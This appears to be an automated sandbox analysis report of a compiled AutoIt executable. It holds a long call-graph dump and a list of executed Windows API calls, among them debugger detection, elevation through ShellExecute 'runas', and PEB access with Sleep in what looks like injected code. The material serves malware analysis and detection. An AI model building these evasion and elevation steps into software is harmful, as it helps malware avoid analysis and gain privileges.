4bf658 99619->99669 99623 4677c7 59 API calls 99624 4ddb0d 99623->99624 99625 4679ab 59 API calls 99624->99625 99626 4ddb24 99625->99626 99627 467e8c 59 API calls 99626->99627 99628 4ddb30 Mailbox 99627->99628 99629 4ddb6c Mailbox 99628->99629 99676 4dd2f3 61 API calls 2 library calls 99628->99676 99629->99608 99631 4dcc9d 99630->99631 99635 4dccf2 99630->99635 99632 480ff6 Mailbox 59 API calls 99631->99632 99634 4dccbf 99632->99634 99633 480ff6 Mailbox 59 API calls 99633->99634 99634->99633 99634->99635 99636 4ddd64 99635->99636 99637 4ddf8d Mailbox 99636->99637 99644 4ddd87 _strcat _wcscpy __wsetenvp 99636->99644 99637->99595 99638 469cf8 59 API calls 99638->99644 99639 469d46 59 API calls 99639->99644 99640 469c9c 59 API calls 99640->99644 99641 469997 84 API calls 99641->99644 99642 48594c 58 API calls _W_store_winword 99642->99644 99644->99637 99644->99638 99644->99639 99644->99640 99644->99641 99644->99642 99679 4c5b29 61 API calls 2 library calls 99644->99679 99646 480e5d 99645->99646 99647 480ef5 VirtualProtect 99646->99647 99648 480ec3 99646->99648 99647->99648 99648->99598 99648->99599 99649->99608 99650->99608 99651->99602 99653 469436 99652->99653 99654 480ff6 Mailbox 59 API calls 99653->99654 99655 469444 99654->99655 99656 469450 99655->99656 99680 46935c 59 API calls Mailbox 99655->99680 99658 4691b0 99656->99658 99681 4692c0 99658->99681 99660 4691bf 99661 480ff6 Mailbox 59 API calls 99660->99661 99662 46925b 99660->99662 99661->99662 99662->99616 99663 468ea0 59 API calls Mailbox 99662->99663 99663->99610 99664->99616 99665->99616 99666->99616 99667->99587 99668->99616 99670 4bf683 __wsetenvp 99669->99670 99673 4bf6b8 99670->99673 99674 4bf769 99670->99674 99675 4bf6c2 99670->99675 99673->99675 99677 467a24 61 API calls 99673->99677 99674->99675 99678 467a24 61 API calls 99674->99678 99675->99623 99675->99628 99676->99629 99677->99673 99678->99674 99679->99644 99680->99656 99682 4692c9 Mailbox 99681->99682 99683 49f5c8 99682->99683 99688 4692d3 99682->99688 99684 480ff6 Mailbox 59 API calls 99683->99684 99686 49f5d4 99684->99686 99685 4692da 99685->99660 99688->99685 99689 469df0 59 API calls Mailbox 99688->99689 99689->99688 99691 4c3e7a 99690->99691 99692 4c46b1 FindFirstFileW 99690->99692 99691->98446 99692->99691 99693 4c46c6 FindClose 99692->99693 99693->99691 99694->98640 99695->98612 99696->98625 99697->98624 99698->98629 99699->98638 99700->98641 99701->98645 99702->98467 99703->98465 99704->98389 99705 46107d 99710 4671eb 99705->99710 99707 46108c 99708 482f80 __cinit 67 API calls 99707->99708 99709 461096 99708->99709 99711 4671fb __write_nolock 99710->99711 99712 4677c7 59 API calls 99711->99712 99713 4672b1 99712->99713 99741 464864 99713->99741 99715 4672ba 99748 48074f 99715->99748 99718 467e0b 59 API calls 99719 4672d3 99718->99719 99754 463f84 99719->99754 99722 4677c7 59 API calls 99723 4672eb 99722->99723 99724 467eec 59 API calls 99723->99724 99725 4672f4 RegOpenKeyExW 99724->99725 99726 49ecda RegQueryValueExW 99725->99726 99731 467316 Mailbox 99725->99731 99727 49ed6c RegCloseKey 99726->99727 99728 49ecf7 99726->99728 99727->99731 99740 49ed7e _wcscat Mailbox __wsetenvp 99727->99740 99729 480ff6 Mailbox 59 API calls 99728->99729 99730 49ed10 99729->99730 99732 46538e 59 API calls 99730->99732 99731->99707 99733 49ed1b RegQueryValueExW 99732->99733 99735 49ed38 99733->99735 99737 49ed52 99733->99737 99734 467b52 59 API calls 99734->99740 99736 467d2c 59 API calls 99735->99736 99736->99737 99737->99727 99738 467f41 59 API calls 99738->99740 99739 463f84 59 API calls 99739->99740 99740->99731 99740->99734 99740->99738 99740->99739 99760 491b90 99741->99760 99744 467f41 59 API calls 99745 464897 99744->99745 99762 4648ae 99745->99762 99747 4648a1 Mailbox 99747->99715 99749 491b90 __write_nolock 99748->99749 99750 48075c GetFullPathNameW 99749->99750 99751 48077e 99750->99751 99752 467d2c 59 API calls 99751->99752 99753 4672c5 99752->99753 99753->99718 99755 463f92 99754->99755 99759 463fb4 _memmove 99754->99759 99758 480ff6 Mailbox 59 API calls 99755->99758 99756 480ff6 Mailbox 59 API calls 99757 463fc8 99756->99757 99757->99722 99758->99759 99759->99756 99761 464871 GetModuleFileNameW 99760->99761 99761->99744 99763 491b90 __write_nolock 99762->99763 99764 4648bb GetFullPathNameW 99763->99764 99765 4648f7 99764->99765 99766 4648da 99764->99766 99768 467eec 59 API calls 99765->99768 99767 467d2c 59 API calls 99766->99767 99769 4648e6 99767->99769 99768->99769 99770 467886 59 API calls 99769->99770 99771 4648f2 99770->99771 99771->99747 99772 487e93 99773 487e9f ___lock_fhandle 99772->99773 99809 48a048 GetStartupInfoW 99773->99809 99775 487ea4 99811 488dbc GetProcessHeap 99775->99811 99777 487efc 99778 487f07 99777->99778 99894 487fe3 58 API calls 3 library calls 99777->99894 99812 489d26 99778->99812 99781 487f0d 99782 487f18 __RTC_Initialize 99781->99782 99895 487fe3 58 API calls 3 library calls 99781->99895 99833 48d812 99782->99833 99785 487f27 99786 487f33 GetCommandLineW 99785->99786 99896 487fe3 58 API calls 3 library calls 99785->99896 99852 495173 GetEnvironmentStringsW 99786->99852 99789 487f32 99789->99786 99792 487f4d 99793 487f58 99792->99793 99897 4832f5 58 API calls 3 library calls 99792->99897 99862 494fa8 99793->99862 99796 487f5e 99797 487f69 99796->99797 99898 4832f5 58 API calls 3 library calls 99796->99898 99876 48332f 99797->99876 99800 487f71 99802 487f7c __wwincmdln 99800->99802 99899 4832f5 58 API calls 3 library calls 99800->99899 99882 46492e 99802->99882 99804 487f90 99805 487f9f 99804->99805 99900 483598 58 API calls _doexit 99804->99900 99901 483320 58 API calls _doexit 99805->99901 99808 487fa4 ___lock_fhandle 99810 48a05e 99809->99810 99810->99775 99811->99777 99902 4833c7 36 API calls 2 library calls 99812->99902 99814 489d2b 99903 489f7c InitializeCriticalSectionAndSpinCount ___lock_fhandle 99814->99903 99816 489d30 99817 489d34 99816->99817 99905 489fca TlsAlloc 99816->99905 99904 489d9c 61 API calls 2 library calls 99817->99904 99820 489d39 99820->99781 99821 489d46 99821->99817 99822 489d51 99821->99822 99906 488a15 99822->99906 99825 489d93 99914 489d9c 61 API calls 2 library calls 99825->99914 99828 489d72 99828->99825 99830 489d78 99828->99830 99829 489d98 99829->99781 99913 489c73 58 API calls 4 library calls 99830->99913 99832 489d80 GetCurrentThreadId 99832->99781 99834 48d81e ___lock_fhandle 99833->99834 99835 489e4b __lock 58 API calls 99834->99835 99836 48d825 99835->99836 99837 488a15 __calloc_crt 58 API calls 99836->99837 99838 48d836 99837->99838 99839 48d8a1 GetStartupInfoW 99838->99839 99840 48d841 ___lock_fhandle @_EH4_CallFilterFunc@8 99838->99840 99845 48d8b6 99839->99845 99849 48d9e5 99839->99849 99840->99785 99841 48daad 99928 48dabd LeaveCriticalSection _doexit 99841->99928 99843 488a15 __calloc_crt 58 API calls 99843->99845 99844 48da32 GetStdHandle 99844->99849 99845->99843 99848 48d904 99845->99848 99845->99849 99846 48da45 GetFileType 99846->99849 99847 48d938 GetFileType 99847->99848 99848->99847 99848->99849 99926 48a06b InitializeCriticalSectionAndSpinCount 99848->99926 99849->99841 99849->99844 99849->99846 99927 48a06b InitializeCriticalSectionAndSpinCount 99849->99927 99853 487f43 99852->99853 99854 495184 99852->99854 99858 494d6b GetModuleFileNameW 99853->99858 99929 488a5d 58 API calls 2 library calls 99854->99929 99856 4951aa _memmove 99857 4951c0 FreeEnvironmentStringsW 99856->99857 99857->99853 99859 494d9f _wparse_cmdline 99858->99859 99861 494ddf _wparse_cmdline 99859->99861 99930 488a5d 58 API calls 2 library calls 99859->99930 99861->99792 99863 494fb9 99862->99863 99864 494fc1 __wsetenvp 99862->99864 99863->99796 99865 488a15 __calloc_crt 58 API calls 99864->99865 99869 494fea __wsetenvp 99865->99869 99866 495041 99867 482f95 _free 58 API calls 99866->99867 99867->99863 99868 488a15 __calloc_crt 58 API calls 99868->99869 99869->99863 99869->99866 99869->99868 99870 495066 99869->99870 99873 49507d 99869->99873 99931 494857 58 API calls __wcsicmp_l 99869->99931 99872 482f95 _free 58 API calls 99870->99872 99872->99863 99932 489006 IsProcessorFeaturePresent 99873->99932 99875 495089 99875->99796 99878 48333b __IsNonwritableInCurrentImage 99876->99878 99947 48a711 99878->99947 99879 483359 __initterm_e 99880 482f80 __cinit 67 API calls 99879->99880 99881 483378 _doexit __IsNonwritableInCurrentImage 99879->99881 99880->99881 99881->99800 99883 464948 99882->99883 99893 4649e7 99882->99893 99884 464982 IsThemeActive 99883->99884 99950 4835ac 99884->99950 99888 4649ae 99962 464a5b SystemParametersInfoW SystemParametersInfoW 99888->99962 99890 4649ba 99963 463b4c 99890->99963 99893->99804 99894->99778 99895->99782 99896->99789 99900->99805 99901->99808 99902->99814 99903->99816 99904->99820 99905->99821 99908 488a1c 99906->99908 99909 488a57 99908->99909 99911 488a3a 99908->99911 99915 495446 99908->99915 99909->99825 99912 48a026 TlsSetValue 99909->99912 99911->99908 99911->99909 99923 48a372 Sleep 99911->99923 99912->99828 99913->99832 99914->99829 99916 495451 99915->99916 99920 49546c 99915->99920 99917 49545d 99916->99917 99916->99920 99924 488d68 58 API calls __getptd_noexit 99917->99924 99918 49547c HeapAlloc 99918->99920 99921 495462 99918->99921 99920->99918 99920->99921 99925 4835e1 DecodePointer 99920->99925 99921->99908 99923->99911 99924->99921 99925->99920 99926->99848 99927->99849 99928->99840 99929->99856 99930->99861 99931->99869 99933 489011 99932->99933 99938 488e99 99933->99938 99937 48902c 99937->99875 99939 488eb3 _memset __call_reportfault 99938->99939 99940 488ed3 IsDebuggerPresent 99939->99940 99946 48a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99940->99946 99942 48c836 _W_store_winword 6 API calls 99944 488fba 99942->99944 99943 488f97 __call_reportfault 99943->99942 99945 48a380 GetCurrentProcess TerminateProcess 99944->99945 99945->99937 99946->99943 99948 48a714 EncodePointer 99947->99948 99948->99948 99949 48a72e 99948->99949 99949->99879 99951 489e4b __lock 58 API calls 99950->99951 99952 4835b7 DecodePointer EncodePointer 99951->99952 100015 489fb5 LeaveCriticalSection 99952->100015 99954 4649a7 99955 483614 99954->99955 99956 483638 99955->99956 99957 48361e 99955->99957 99956->99888 99957->99956 100016 488d68 58 API calls __getptd_noexit 99957->100016 99959 483628 100017 488ff6 9 API calls __wcsicmp_l 99959->100017 99961 483633 99961->99888 99962->99890 99964 463b59 __write_nolock 99963->99964 99965 4677c7 59 API calls 99964->99965 99966 463b63 GetCurrentDirectoryW 99965->99966 100018 463778 99966->100018 99968 463b8c IsDebuggerPresent 99969 49d4ad MessageBoxA 99968->99969 99970 463b9a 99968->99970 99972 49d4c7 99969->99972 99971 463c73 99970->99971 99970->99972 100015->99954 100016->99959 100017->99961 100019 4677c7 59 API calls 100018->100019 100020 46378e 100019->100020 100143 463d43 100020->100143 100022 4637ac 100023 464864 61 API calls 100022->100023 100024 4637c0 100023->100024 100025 467f41 59 API calls 100024->100025 100026 4637cd 100025->100026 100027 464f3d 136 API calls 100026->100027 100028 4637e6 100027->100028 100029 49d3ae 100028->100029 100030 4637ee Mailbox 100028->100030 100185 4c97e5 100029->100185 100032 4681a7 59 API calls 100030->100032 100036 463801 100032->100036 100033 49d3cd 100035 482f95 _free 58 API calls 100033->100035 100038 49d3da 100035->100038 100157 4693ea 100036->100157 100037 464faa 84 API calls 100037->100033 100040 464faa 84 API calls 100038->100040 100042 49d3e3 100040->100042 100046 463ee2 59 API calls 100042->100046 100043 467f41 59 API calls 100044 46381a 100043->100044 100045 468620 69 API calls 100044->100045 100047 46382c Mailbox 100045->100047 100048 49d3fe 100046->100048 100049 467f41 59 API calls 100047->100049 100050 463ee2 59 API calls 100048->100050 100051 463852 100049->100051 100052 49d41a 100050->100052 100053 468620 69 API calls 100051->100053 100054 464864 61 API calls 100052->100054 100056 463861 Mailbox 100053->100056 100055 49d43f 100054->100055 100057 463ee2 59 API calls 100055->100057 100059 4677c7 59 API calls 100056->100059 100058 49d44b 100057->100058 100060 4681a7 59 API calls 100058->100060 100061 46387f 100059->100061 100062 49d459 100060->100062 100160 463ee2 100061->100160 100064 463ee2 59 API calls 100062->100064 100066 49d468 100064->100066 100072 4681a7 59 API calls 100066->100072 100068 463899 100068->100042 100069 4638a3 100068->100069 100070 48313d _W_store_winword 60 API calls 100069->100070 100071 4638ae 100070->100071 100071->100048 100073 4638b8 100071->100073 100074 49d48a 100072->100074 100075 48313d _W_store_winword 60 API calls 100073->100075 100076 463ee2 59 API calls 100074->100076 100077 4638c3 100075->100077 100078 49d497 100076->100078 100077->100052 100079 4638cd 100077->100079 100078->100078 100080 48313d _W_store_winword 60 API calls 100079->100080 100081 4638d8 100080->100081 100081->100066 100082 463919 100081->100082 100084 463ee2 59 API calls 100081->100084 100082->100066 100083 463926 100082->100083 100086 46942e 59 API calls 100083->100086 100085 4638fc 100084->100085 100087 4681a7 59 API calls 100085->100087 100088 463936 100086->100088 100089 46390a 100087->100089 100090 4691b0 59 API calls 100088->100090 100091 463ee2 59 API calls 100089->100091 100092 463944 100090->100092 100091->100082 100176 469040 100092->100176 100094 4693ea 59 API calls 100096 463961 100094->100096 100095 469040 60 API calls 100095->100096 100096->100094 100096->100095 100097 463ee2 59 API calls 100096->100097 100098 4639a7 Mailbox 100096->100098 100097->100096 100098->99968 100144 463d50 __write_nolock 100143->100144 100145 467d2c 59 API calls 100144->100145 100149 463eb6 Mailbox 100144->100149 100147 463d82 100145->100147 100146 467b52 59 API calls 100146->100147 100147->100146 100156 463db8 Mailbox 100147->100156 100148 463e89 100148->100149 100150 467f41 59 API calls 100148->100150 100149->100022 100152 463eaa 100150->100152 100151 467f41 59 API calls 100151->100156 100154 463f84 59 API calls 100152->100154 100153 467b52 59 API calls 100153->100156 100154->100149 100155 463f84 59 API calls 100155->100156 100156->100148 100156->100149 100156->100151 100156->100153 100156->100155 100158 480ff6 Mailbox 59 API calls 100157->100158 100159 46380d 100158->100159 100159->100043 100161 463f05 100160->100161 100162 463eec 100160->100162 100163 467d2c 59 API calls 100161->100163 100164 4681a7 59 API calls 100162->100164 100165 46388b 100163->100165 100164->100165 100166 48313d 100165->100166 100167 483149 100166->100167 100168 4831be 100166->100168 100172 48316e 100167->100172 100220 488d68 58 API calls __getptd_noexit 100167->100220 100222 4831d0 60 API calls 3 library calls 100168->100222 100171 4831cb 100171->100068 100172->100068 100173 483155 100221 488ff6 9 API calls __wcsicmp_l 100173->100221 100175 483160 100175->100068 100177 49f5a5 100176->100177 100182 469057 100176->100182 100177->100182 100224 468d3b 59 API calls Mailbox 100177->100224 100179 4691a0 100223 469e9c 60 API calls Mailbox 100179->100223 100180 469158 100183 480ff6 Mailbox 59 API calls 100180->100183 100182->100179 100182->100180 100184 46915f 100182->100184 100183->100184 100184->100096 100186 465045 85 API calls 100185->100186 100187 4c9854 100186->100187 100188 4c99be 96 API calls 100187->100188 100189 4c9866 100188->100189 100190 46506b 74 API calls 100189->100190 100218 49d3c1 100189->100218 100191 4c9881 100190->100191 100192 46506b 74 API calls 100191->100192 100193 4c9891 100192->100193 100194 46506b 74 API calls 100193->100194 100195 4c98ac 100194->100195 100196 46506b 74 API calls 100195->100196 100197 4c98c7 100196->100197 100198 465045 85 API calls 100197->100198 100199 4c98de 100198->100199 100200 48594c _W_store_winword 58 API calls 100199->100200 100201 4c98e5 100200->100201 100202 48594c _W_store_winword 58 API calls 100201->100202 100203 4c98ef 100202->100203 100204 46506b 74 API calls 100203->100204 100205 4c9903 100204->100205 100206 4c9393 GetSystemTimeAsFileTime 100205->100206 100207 4c9916 100206->100207 100208 4c992b 100207->100208 100209 4c9940 100207->100209 100210 482f95 _free 58 API calls 100208->100210 100211 4c99a5 100209->100211 100212 4c9946 100209->100212 100213 4c9931 100210->100213 100215 482f95 _free 58 API calls 100211->100215 100214 4c8d90 116 API calls 100212->100214 100216 482f95 _free 58 API calls 100213->100216 100217 4c999d 100214->100217 100215->100218 100216->100218 100219 482f95 _free 58 API calls 100217->100219 100218->100033 100218->100037 100219->100218 100220->100173 100221->100175 100222->100171 100223->100184 100224->100182 100541 4a0226 100550 46ade2 Mailbox 100541->100550 100543 4a0c86 100653 4b66f4 100543->100653 100545 4a0c8f 100547 4a00e0 VariantClear 100547->100550 100548 46b6c1 100652 4ca0b5 89 API calls 4 library calls 100548->100652 100550->100543 100550->100545 100550->100547 100550->100548 100554 4d474d 100550->100554 100563 4cd2e6 100550->100563 100610 472123 100550->100610 100650 469df0 59 API calls Mailbox 100550->100650 100651 4b7405 59 API calls 100550->100651 100555 469997 84 API calls 100554->100555 100556 4d4787 100555->100556 100557 4663a0 94 API calls 100556->100557 100558 4d4797 100557->100558 100559 4d47bc 100558->100559 100560 46a000 341 API calls 100558->100560 100562 4d47c0 100559->100562 100656 469bf8 100559->100656 100560->100559 100562->100550 100564 4cd305 100563->100564 100567 4cd310 100563->100567 100669 469c9c 59 API calls 100564->100669 100566 480ff6 Mailbox 59 API calls 100568 4cd433 100566->100568 100569 4677c7 59 API calls 100567->100569 100608 4cd3ea Mailbox 100567->100608 100570 4cd43f 100568->100570 100672 465906 60 API calls Mailbox 100568->100672 100571 4cd334 100569->100571 100575 469997 84 API calls 100570->100575 100572 4677c7 59 API calls 100571->100572 100574 4cd33d 100572->100574 100577 469997 84 API calls 100574->100577 100576 4cd457 100575->100576 100578 465956 67 API calls 100576->100578 100579 4cd349 100577->100579 100580 4cd466 100578->100580 100581 4646f9 59 API calls 100579->100581 100582 4cd49e 100580->100582 100583 4cd46a GetLastError 100580->100583 100584 4cd35e 100581->100584 100587 4cd4c9 100582->100587 100588 4cd500 100582->100588 100585 4cd483 100583->100585 100586 467c8e 59 API calls 100584->100586 100605 4cd3f3 Mailbox 100585->100605 100673 465a1a CloseHandle 100585->100673 100589 4cd391 100586->100589 100590 480ff6 Mailbox 59 API calls 100587->100590 100592 480ff6 Mailbox 59 API calls 100588->100592 100591 4cd3e3 100589->100591 100596 4c3e73 3 API calls 100589->100596 100593 4cd4ce 100590->100593 100671 469c9c 59 API calls 100591->100671 100597 4cd505 100592->100597 100598 4cd4df 100593->100598 100600 4677c7 59 API calls 100593->100600 100599 4cd3a1 100596->100599 100602 4677c7 59 API calls 100597->100602 100597->100605 100674 4cf835 59 API calls 2 library calls 100598->100674 100599->100591 100601 4cd3a5 100599->100601 100600->100598 100604 467f41 59 API calls 100601->100604 100602->100605 100606 4cd3b2 100604->100606 100605->100550 100670 4c3c66 63 API calls Mailbox 100606->100670 100608->100566 100608->100605 100609 4cd3bb Mailbox 100609->100591 100611 469bf8 59 API calls 100610->100611 100612 47213b 100611->100612 100614 480ff6 Mailbox 59 API calls 100612->100614 100616 4a69af 100612->100616 100615 472154 100614->100615 100618 472164 100615->100618 100690 465906 60 API calls Mailbox 100615->100690 100617 472189 100616->100617 100694 4cf7df 59 API calls 100616->100694 100626 472196 100617->100626 100695 469c9c 59 API calls 100617->100695 100620 469997 84 API calls 100618->100620 100621 472172 100620->100621 100623 465956 67 API calls 100621->100623 100625 472181 100623->100625 100624 4a69f7 100624->100626 100627 4a69ff 100624->100627 100625->100616 100625->100617 100693 465a1a CloseHandle 100625->100693 100628 465e3f 2 API calls 100626->100628 100696 469c9c 59 API calls 100627->100696 100631 47219d 100628->100631 100632 4721b7 100631->100632 100633 4a6a11 100631->100633 100635 4677c7 59 API calls 100632->100635 100634 480ff6 Mailbox 59 API calls 100633->100634 100636 4a6a17 100634->100636 100637 4721bf 100635->100637 100638 4a6a2b 100636->100638 100697 4659b0 ReadFile SetFilePointerEx 100636->100697 100675 4656d2 100637->100675 100644 4a6a2f _memmove 100638->100644 100698 4c794e 59 API calls 2 library calls 100638->100698 100642 4721ce 100642->100644 100691 469b9c 59 API calls Mailbox 100642->100691 100645 4721e2 Mailbox 100646 47221c 100645->100646 100647 465dcf CloseHandle 100645->100647 100646->100550 100648 472210 100647->100648 100648->100646 100692 465a1a CloseHandle 100648->100692 100650->100550 100651->100550 100652->100543 100736 4b6636 100653->100736 100655 4b6702 100655->100545 100657 49fbff 100656->100657 100658 469c08 100656->100658 100659 49fc10 100657->100659 100660 467d2c 59 API calls 100657->100660 100663 480ff6 Mailbox 59 API calls 100658->100663 100661 467eec 59 API calls 100659->100661 100660->100659 100662 49fc1a 100661->100662 100667 4677c7 59 API calls 100662->100667 100668 469c34 100662->100668 100664 469c1b 100663->100664 100664->100662 100665 469c26 100664->100665 100666 467f41 59 API calls 100665->100666 100665->100668 100666->100668 100667->100668 100668->100562 100669->100567 100670->100609 100671->100608 100672->100570 100673->100605 100674->100605 100676 465702 100675->100676 100677 4656dd 100675->100677 100678 467eec 59 API calls 100676->100678 100677->100676 100681 4656ec 100677->100681 100682 4c349a 100678->100682 100679 4c34c9 100679->100642 100701 465c18 100681->100701 100682->100679 100699 4c3436 ReadFile SetFilePointerEx 100682->100699 100700 467a84 59 API calls 2 library calls 100682->100700 100689 4c35d8 Mailbox 100689->100642 100690->100618 100691->100645 100692->100646 100693->100616 100694->100616 100695->100624 100696->100631 100697->100638 100698->100644 100699->100682 100700->100682 100702 480ff6 Mailbox 59 API calls 100701->100702 100703 465c2b 100702->100703 100704 480ff6 Mailbox 59 API calls 100703->100704 100705 465c37 100704->100705 100706 465632 100705->100706 100713 465a2f 100706->100713 100708 465674 100708->100689 100712 46793a 61 API calls Mailbox 100708->100712 100709 465d20 2 API calls 100710 465643 100709->100710 100710->100708 100710->100709 100720 465bda 100710->100720 100712->100689 100714 465a40 100713->100714 100715 49e065 100713->100715 100714->100710 100729 4b6443 59 API calls Mailbox 100715->100729 100717 49e06f 100718 480ff6 Mailbox 59 API calls 100717->100718 100719 49e07b 100718->100719 100721 465bee 100720->100721 100722 49e117 100720->100722 100730 465b19 100721->100730 100735 4b6443 59 API calls Mailbox 100722->100735 100725 465bfa 100725->100710 100726 49e122 100727 480ff6 Mailbox 59 API calls 100726->100727 100728 49e137 _memmove 100727->100728 100729->100717 100731 465b31 100730->100731 100734 465b2a _memmove 100730->100734 100732 480ff6 Mailbox 59 API calls 100731->100732 100733 49e0a7 100731->100733 100732->100734 100733->100733 100734->100725 100735->100726 100737 4b665e 100736->100737 100738 4b6641 100736->100738 100737->100655 100738->100737 100740 4b6621 59 API calls Mailbox 100738->100740 100740->100738 100741 46568a 100742 465c18 59 API calls 100741->100742 100743 46569c 100742->100743 100744 465632 61 API calls 100743->100744 100745 4656aa 100744->100745 100747 4656ba Mailbox 100745->100747 100748 4681c1 MultiByteToWideChar 100745->100748 100749 4681e7 100748->100749 100750 46822e 100748->100750 100751 480ff6 Mailbox 59 API calls 100749->100751 100752 467eec 59 API calls 100750->100752 100753 4681fc MultiByteToWideChar 100751->100753 100754 468220 100752->100754 100756 4678ad 100753->100756 100754->100747 100757 46792f 100756->100757 100758 4678bc 100756->100758 100759 467e8c 59 API calls 100757->100759 100758->100757 100760 4678c8 100758->100760 100765 4678da _memmove 100759->100765 100761 4678d2 100760->100761 100762 467900 100760->100762 100768 468087 59 API calls Mailbox 100761->100768 100763 468189 59 API calls 100762->100763 100766 46790a 100763->100766 100765->100754 100767 480ff6 Mailbox 59 API calls 100766->100767 100767->100765 100768->100765 100769 49ff06 100770 49ff10 100769->100770 100809 46ac90 Mailbox _memmove 100769->100809 100867 468e34 59 API calls Mailbox 100770->100867 100775 480ff6 59 API calls Mailbox 100793 46a097 Mailbox 100775->100793 100778 46b5d5 100780 4681a7 59 API calls 100778->100780 100788 46a1b7 100780->100788 100781 4a047f 100871 4ca0b5 89 API calls 4 library calls 100781->100871 100783 4681a7 59 API calls 100783->100793 100784 467f41 59 API calls 100784->100809 100786 4a048e 100787 4677c7 59 API calls 100787->100793 100789 482f80 67 API calls __cinit 100789->100793 100791 4b7405 59 API calls 100791->100793 100792 4b66f4 Mailbox 59 API calls 100792->100788 100793->100775 100793->100778 100793->100781 100793->100783 100793->100787 100793->100788 100793->100789 100793->100791 100794 4a0e00 100793->100794 100796 46b5da 100793->100796 100798 46a6ba 100793->100798 100861 46ca20 341 API calls 2 library calls 100793->100861 100862 46ba60 60 API calls Mailbox 100793->100862 100876 4ca0b5 89 API calls 4 library calls 100794->100876 100877 4ca0b5 89 API calls 4 library calls 100796->100877 100797 4dbf80 341 API calls 100797->100809 100875 4ca0b5 89 API calls 4 library calls 100798->100875 100799 4b66f4 Mailbox 59 API calls 100799->100809 100800 46b416 100866 46f803 341 API calls 100800->100866 100802 46a000 341 API calls 100802->100809 100803 4a0c94 100873 469df0 59 API calls Mailbox 100803->100873 100805 4a0ca2 100874 4ca0b5 89 API calls 4 library calls 100805->100874 100807 4a0c86 100807->100788 100807->100792 100808 46b37c 100864 469e9c 60 API calls Mailbox 100808->100864 100809->100784 100809->100788 100809->100793 100809->100797 100809->100799 100809->100800 100809->100802 100809->100803 100809->100805 100809->100808 100811 480ff6 59 API calls Mailbox 100809->100811 100815 46b685 100809->100815 100818 46ade2 Mailbox 100809->100818 100823 4dc5f4 100809->100823 100855 4c7be0 100809->100855 100868 4b7405 59 API calls 100809->100868 100869 4dc4a7 85 API calls 2 library calls 100809->100869 100811->100809 100812 46b38d 100865 469e9c 60 API calls Mailbox 100812->100865 100872 4ca0b5 89 API calls 4 library calls 100815->100872 100818->100788 100818->100807 100818->100815 100819 4a00e0 VariantClear 100818->100819 100820 4d474d 341 API calls 100818->100820 100821 472123 95 API calls 100818->100821 100822 4cd2e6 101 API calls 100818->100822 100863 469df0 59 API calls Mailbox 100818->100863 100870 4b7405 59 API calls 100818->100870 100819->100818 100820->100818 100821->100818 100822->100818 100824 4677c7 59 API calls 100823->100824 100825 4dc608 100824->100825 100826 4677c7 59 API calls 100825->100826 100827 4dc610 100826->100827 100828 4677c7 59 API calls 100827->100828 100829 4dc618 100828->100829 100830 469997 84 API calls 100829->100830 100840 4dc626 100830->100840 100831 467d2c 59 API calls 100831->100840 100832 4dc7f6 100838 467e0b 59 API calls 100832->100838 100834 4dc83c Mailbox 100834->100809 100835 467a84 59 API calls 100835->100840 100836 4dc811 100839 467e0b 59 API calls 100836->100839 100837 4681a7 59 API calls 100837->100840 100841 4dc803 100838->100841 100843 4dc820 100839->100843 100840->100831 100840->100832 100840->100834 100840->100835 100840->100836 100840->100837 100844 467faf 59 API calls 100840->100844 100845 4dc80f 100840->100845 100847 467faf 59 API calls 100840->100847 100852 467e0b 59 API calls 100840->100852 100853 469997 84 API calls 100840->100853 100854 467c8e 59 API calls 100840->100854 100842 467c8e 59 API calls 100841->100842 100842->100845 100846 467c8e 59 API calls 100843->100846 100848 4dc6bd CharUpperBuffW 100844->100848 100845->100834 100879 469b9c 59 API calls Mailbox 100845->100879 100846->100845 100849 4dc77d CharUpperBuffW 100847->100849 100878 46859a 68 API calls 100848->100878 100851 46c707 69 API calls 100849->100851 100851->100840 100852->100840 100853->100840 100854->100840 100856 4c7bec 100855->100856 100857 480ff6 Mailbox 59 API calls 100856->100857 100858 4c7bfa 100857->100858 100859 4677c7 59 API calls 100858->100859 100860 4c7c08 100858->100860 100859->100860 100860->100809 100861->100793 100862->100793 100863->100818 100864->100812 100865->100800 100866->100815 100867->100809 100868->100809 100869->100809 100870->100818 100871->100786 100872->100807 100873->100807 100874->100807 100875->100788 100876->100796 100877->100788 100878->100840 100879->100834 100880 10fda80 100894 10fb6d0 100880->100894 100882 10fdb07 100897 10fd970 100882->100897 100896 10fbd5b 100894->100896 100900 10feb30 GetPEB 100894->100900 100896->100882 100898 10fd979 Sleep 100897->100898 100899 10fd987 100898->100899 100900->100896

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 00463B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00463B7A
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00463B8C
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,005262F8,005262E0,?,?), ref: 00463BFD
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                              • Part of subcall function 00470A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00463C26,005262F8,?,?,?), ref: 00470ACE
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00463C81
                                                                                                                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005193F0,00000010), ref: 0049D4BC
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,005262F8,?,?,?), ref: 0049D4F4
                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00515D40,005262F8,?,?,?), ref: 0049D57A
                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0049D581
                                                                                                                                                                              • Part of subcall function 00463A58: GetSysColorBrush.USER32(0000000F), ref: 00463A62
                                                                                                                                                                              • Part of subcall function 00463A58: LoadCursorW.USER32(00000000,00007F00), ref: 00463A71
                                                                                                                                                                              • Part of subcall function 00463A58: LoadIconW.USER32(00000063), ref: 00463A88
                                                                                                                                                                              • Part of subcall function 00463A58: LoadIconW.USER32(000000A4), ref: 00463A9A
                                                                                                                                                                              • Part of subcall function 00463A58: LoadIconW.USER32(000000A2), ref: 00463AAC
                                                                                                                                                                              • Part of subcall function 00463A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00463AD2
